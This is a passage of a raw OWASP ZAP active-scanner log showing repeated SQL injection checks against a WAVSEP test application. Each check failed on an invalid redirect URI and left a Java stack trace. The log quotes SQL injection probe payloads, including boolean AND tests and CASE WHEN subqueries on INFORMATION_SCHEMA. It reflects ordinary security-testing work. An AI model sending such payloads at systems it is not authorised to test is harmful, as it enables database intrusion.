Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681615 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 9604=8165 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 9604=8165 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681616 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 2499=2499 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 2499=2499 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681617 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 5570=5570 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 5570=5570 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681618 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 9604=8165 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 9604=8165 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681619 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8705=2884 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8705=2884 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681620 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 8216=6126-- SCmh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 8216=6126-- SCmh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681620 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9283=7457-- wSQF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9283=7457-- wSQF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681622 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9481=9481-- geIL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9481=9481-- geIL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681622 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 3653=3653-- YzJG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 3653=3653-- YzJG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681623 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 8216=6126-- SCmh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 8216=6126-- SCmh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681624 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9283=7457-- wSQF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9283=7457-- wSQF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681625 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (2656=6215) THEN 2656 ELSE 2656*(SELECT 2656 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (2656=6215) THEN 2656 ELSE 2656*(SELECT 2656 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681625 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1804=5587) THEN 1804 ELSE 1804*(SELECT 1804 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (1804=5587) THEN 1804 ELSE 1804*(SELECT 1804 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681626 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (7184=7184) THEN 7184 ELSE 7184*(SELECT 7184 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (7184=7184) THEN 7184 ELSE 7184*(SELECT 7184 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681626 [ZAP-ActiveScanner-0] WARN 